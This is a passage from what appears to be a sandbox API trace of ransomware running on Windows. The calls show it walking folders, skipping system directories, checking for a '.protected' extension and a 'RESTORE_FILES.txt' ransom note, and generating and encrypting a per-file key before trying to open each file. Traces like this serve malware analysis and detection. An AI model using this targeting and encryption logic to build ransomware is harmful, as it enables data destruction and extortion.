(lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\.") returned 93 [0093.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\..") returned 94 [0093.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 106 [0093.136] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0093.136] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 104 [0093.137] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.137] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Windows") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 102 [0093.137] StrStrIW (lpFirst="device.png", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="device.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.137] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Windows") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 103 [0093.137] StrStrIW (lpFirst="overlay.png", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="overlay.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 109 [0093.138] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.138] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files (x86)") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="$Recycle.bin") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="System Volume Information") returned -1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 104 [0093.138] StrStrIW (lpFirst="superbar.png", lpSrch=".protected") returned 0x0 [0093.138] lstrcmpW (lpString1="superbar.png", lpString2="RESTORE_FILES.txt") returned 1 [0093.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.138] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 109 [0093.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.138] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files") returned -1 [0093.138] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 91 [0093.139] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0093.139] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 93 [0093.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.139] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\.") returned 93 [0093.139] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.139] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\..") returned 94 [0093.139] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.139] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.139] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 106 [0093.139] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0093.139] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 104 [0093.140] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.140] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.140] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 109 [0093.140] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files (x86)") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="System Volume Information") returned 1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 105 [0093.140] StrStrIW (lpFirst="watermark.png", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="watermark.png", lpString2="RESTORE_FILES.txt") returned 1 [0093.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.141] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.141] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.141] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 109 [0093.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.141] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.141] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 70 [0093.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.142] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.142] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 63 [0093.142] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.142] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.142] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="Windows") returned -1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="Program Files") returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="Program Files (x86)") returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="$Recycle.bin") returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="System Volume Information") returned 1 [0093.142] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 50 [0093.142] lstrcmpW (lpString1="Task", lpString2=".") returned 1 [0093.142] lstrcmpW (lpString1="Task", lpString2="..") returned 1 [0093.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned 52 [0093.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.143] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.143] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\.") returned 52 [0093.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.143] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\..") returned 53 [0093.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.143] wnsprintfW 